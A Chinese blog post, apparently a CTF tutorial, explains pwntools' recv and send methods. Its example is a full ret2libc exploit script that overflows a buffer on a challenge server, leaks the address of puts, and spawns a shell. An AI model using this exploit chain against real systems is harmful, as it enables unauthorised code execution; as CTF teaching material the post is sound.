对pwntools之recv,send方法的理解

最新推荐文章于 2022-11-29 08:52:08 发布
最新推荐文章于 2022-11-29 08:52:08 发布
阅读量1.5w 收藏 73
点赞数 23
分类专栏: CTF解题 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanqdi_/article/details/107164199
版权

pwntools学习

一般在做pwn题,写利用脚本时,会用到recv,send等函数,之前我理解为什么send,不理解recv的作用,现在通过一道题目理解了。下面详细讲解下recv及send的作用。

remote(“一个域名或者ip地址”, 端口) 会连接到我们指定的地址及端口。 然后该函数会返回remote对象 (这里,我们将该对象保存到了变量 c)。remote对象主要用来进行对远程主机的输入输出。
主要方法有:

接收远端传回的数据

interactive() : 在取得shell之后使用,直接进行交互,相当于回到shell的模式。

recv(numb=字节大小, timeout=default) : 接收指定字节数。

recvall() : 一直接收直到达到文件EOF。

recvline(keepends=True) : 接收一行,keepends为是否保留行尾的\n。

recvuntil(delims, drop=False) : 一直读到delims的pattern出现为止。

recvrepeat(timeout=default) : 持续接收直到EOF或timeout。

类似于read的作用,读从远端输出的内容。

向远端发送数据

send(data) : 发送数据。

sendline(data) : 发送一行数据,相当于在数据末尾加\n。

类似于write的作用,向远端发送数据。

其实这里可以理解为:向远端send一些内容,然后远端返回一些内容,用recv接收。
下面用一个具体例子来进一步解释:

from pwn import *
from LibcSearcher import LibcSearcher

elf = ELF('./pwn2')
r = remote("campus1.blue-whale.me", 9991)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = 0x08048519
payload1 = 'a'*92+p32(puts_plt)+p32(main)+p32(puts_got)
r.recvuntil("welcome to ROP world\n")  ##只有接收了前边的输出,才能保证下边接收到的输出是puts_addr。如果没有这行代码,利用失败,因为下边recv()[0:4]接收的可能就是远端返回的其他输出数据,比如“welcome to ROP world\n”的前4个字节。
r.sendline(payload1) ## 向远端发送payload1,会得到远端响应,即put出put的地址
puts_addr=u32(r.recv()[0:4])## 用recv函数接收输出的put地址

libc=LibcSearcher("puts",puts_addr)

libc_base = puts_addr-libc.dump('puts')
sys_addr = libc_base+libc.dump('system')
binsh_addr = libc_base+libc.dump('str_bin_sh')

payload = 'a'*92+p32(sys_addr)+'bbbb'+p32(binsh_addr)
r.sendline(payload)
r.interactive()

由此可见,在写pwn题目利用脚本时,recv方法还是挺重要的,以前我没有理解它的作用,觉得可写可不写,确实有的题目不会影响利用脚本的结果,但是,写上会减少错误的发生。

参考

https://www.jianshu.com/p/8d6b605eb7fc

123111234
关注
  • 23
    点赞
  • 73
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwntools的基本用法
weixin_44222568的博客
09-15 4186
一、实验名称 pwntools的基本用法 二、实验目的和要求 1.掌握pwntools的基本使用方法 2.掌握如何编写exploit 三、实验内容 1.Process 2.Attach 3.Shellcraft 四、实验环境(软、硬件环境,主要仪器设备) Linux操作系统,pwntools 五、实验数据记录 1.交互 本地:sh=process("./2.dms") 远程:sh=remote(“127.0.0.1”,10001) (1)127.0.0.1表示本地测验,实际题目容器会给定IP地址和端口,连接
pwntools工具的使用(随时更新中...)
lifanxin的博客
12-11 4779
pwntools工具的使用基本交互和输入输出绑定要处理的程序获取程序输出实现输入 基本交互和输入输出 绑定要处理的程序 # 远程 # remote(ip/hostname, port) p = remote("127.0.0.1", 8888) # 本地 # 注意process中参数一定要有./ p = process("./pwn") 获取程序输出 buf = p.recvline() # buf为程序的一行输出 buf = p.recv() # buf为程序的当前全部输出 # 直
Pwntools 2022简明手册
kelxLZ的博客
02-26 1万+
Author:ZERO-A-ONE Date:2022-02-24 本文翻译自:https://github.com/Gallopsled/pwntools-tutorial,主要是考虑到目前中文互联网中关于系统介绍pwntools使用方法的文章都比较老和杂乱,且转换为Python3后又有许多零零散散的问题,看到这个仓库中包含了很多使用技巧和调试问题的解决方案,感到可以翻译一下 这个资源库包含了一些开始使用pwntools(和pwntools)的基本教程。 这些教程并不致力于解释逆向工程或利用,而是.
pwntools介绍及使用
cm_zl
04-27 1万+
什么是pwntools? 简单来说就以一整套pwn工具集,涵盖了pwn题利用脚本所需要的各种工具。 Pwntools主要作用? 包括方便的IO交互函数,ROP、格式化字符串等利用的自动化工具,shellcode生成器等等。 为什么选择pwntools? 目前最好用也是仅有的大型pwn利用框架。能节省大量编写脚本的时间。 Pwntools模块总览 pwntools使用参考文献 Pwnlib.asm ...
recv函数和readline实现思想
1
01-27 285
传智扫地僧课程学习笔记。 上节课是通过定包长的方式来解决, 这节课通过在包尾加\n,说一下,puts默认就加的有\n, flag标志,之前都是用默认,这回用上了,
PWNTOOLS的基本使用
weixin_62675330的博客
02-11 2016
pwntools的基本使用 首先需要 from pwn import * 把 pwntools 导入进来,它同时会把一些系统库给导入进来 本地打的话 p=process('./filename'),远程的话 p=remote('192.168.1.103',10001) p.close() 关闭 发送 payload p.send(payload) 发送 payload p.sendline(payload) 发送 payload,并进行换行(末尾\n) p.sendafter(some_string,
send(),recv()函数的全面理解
09-15
下面小编就为大家带来一篇对send(),recv()函数的全面理解。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Socket-send-and-recv-.rar_c socket send recv_socket
09-21
本文将深入探讨"Socket下sendrecv使用的说明及介绍"这一主题,帮助开发者更好地理解和运用这两个关键函数。 Socket API提供了sendrecv函数,它们是TCP/IP通信的核心组件,用于在套接字之间发送和接收数据。在...
send-recv-init
12-09
本文将深入探讨`send`和`recv`的工作原理、使用方法以及它们在实际应用中的重要性。 `send`函数用于向连接的套接字发送数据。其原型如下: ```c ssize_t send(int socket, const void *buf, size_t len, int flags...
com_recv_send.zip_com_recv
09-21
"com_recv_send.zip_com_recv"这个项目显然关注的是在本地计算机上利用串行端口(COM口)进行数据的发送与接收,而非使用网络编程中的SOCKET接口。下面我们将详细探讨串口通信的基本原理、实现方法以及如何在本地...
pwntools常用脚本语句介绍讲解
半岛铁盒的博客
02-23 2886
接收远端传回的数据 interactive() : 在取得shell之后使用,直接进行交互,相当于回到shell的模式。 recv(numb=字节大小, timeout=default) : 接收指定字节数。 recvall() : 一直接收直到达到文件EOF。 recvline(keepends=True) : 接收一行,keepends为是否保留行尾的\n。 recvuntil(delims, drop=False) : 一直读到delims的pattern出现为止。 recvrepeat(timeou
日志2019.6.15
RobinZZX的博客
06-21 204
pwn recvuntil('aaa',drop=True/False) #drop='True'表示返回的字符串中aaa不保留 x32 payload跳转到函数func()写法 x32地址大小为4位 payload = 'a'*n + p32(func_addr) + <下一跳地址,没有可以用aaaa代替> + p32<参数1> + p32<参数2> + ...
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3061
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
[PWN][补充篇]pwntools的相关知识
网络安全知识分享
03-28 1794
@TOC 0x0 安装 sudo pip install pwntools 0x1 导入包 from pwn import* 0x2 链接远程服务器或者链接本地文件 远程 r = remote(‘目的IP或目标URL’,目标端口号) 本地 r = process('./文件名') 0x3 接收远端回传的数据 interactive() //在取得shell之后使用,直接进行交互,相当于回到shell的模式 recv(numb = 字节大小,timeout = default) //接收指定字节数
PWN的学习
ca1m4n的博客
02-05 1424
PWN的学习写在前面的话0x01 Hello,PWN!0x02 写在前面的话 如题,胖手的回归我愿称之为重操旧业。pwn的学习难度比较大,牵涉范围又广,我也不知道为啥选了这个方向????。前两天写个最简单的溢出没写出来,想想趁这个寒假重新学起,笔记po这里日常更新????仅供参考,不是系统学习,以打比赛为目的,途径主要是到处找的小视频、大佬们的博客和题目。希望看到的铁汁们不吝赐教! 0x01 Hello,PWN! "Pwn"是一个黑客语法的俚语词,是指攻破设备或者系统 。 CTF中的pwn是指通过程序本身
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
recv 函数用法
skyie的专栏
04-26 2209
int recv( SOCKET s,     char FAR *buf,      int len,     int flags     );    不论是客户还是服务器应用程序都用recv函数从TCP连接的另一端接收数据。 该函数的第一个参数指定接收端套接字描述符; 第二个参数指明一个缓冲区,该缓冲区用来存放recv函数接收到的数据; 第三个参数指明buf的长度;
python3-pwntools教程_pwntools的简单介绍
weixin_42502378的博客
01-14 1317
pwntools是一个CTF框架和漏洞利用开发库,用Python开发,旨在让使用者简单快速的编写exploit。这里简单的介绍一下pwntools的使用。首先就是导入包from pwn import *你将在全局空间里引用pwntools的所有函数。现在可以用一些简单函数进行汇编,反汇编,pack,unpack等等操作。将包导入后,我一般都会设置日志记录级别,方便出现问题的时候排查错误contex...
一步一步学pwntools(适合新手)
qq_41683305的博客
04-09 4815
pwntools是一个二进制利用框架。官方文档提供了详细的api规范。然而目前并没有一个很好的新手教程。因此我用了我过去的几篇writeup。由于本文只是用来介绍pwntools使用方法,我不会过于详细的讲解各种二进制漏洞攻击技术。 Pwntools的“Hello World” 栈溢出无疑是二进制攻击的“Hello World”。这里,我们用pwnable.kr的bof来进行展示。 #incl...
socket recv send
最新发布
08-15
在进行TCP协议传输时,使用socket进行数据的接收和发送是很常见的操作。对于接收数据,可以使用recv函数来接收。但需要注意的是,recv函数并不一定与send函数一一对应。也就是说,不是send一次就一定recv一次就接收完。可能需要多次recv才能接收完一次send的数据,也可能一次recv就能接收完多次send的数据。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [socket编程中的recv函数和send函数](https://blog.csdn.net/modi000/article/details/105580382)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [深入理解socket中的recv函数和send函数](https://blog.csdn.net/qq_36915078/article/details/107728888)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值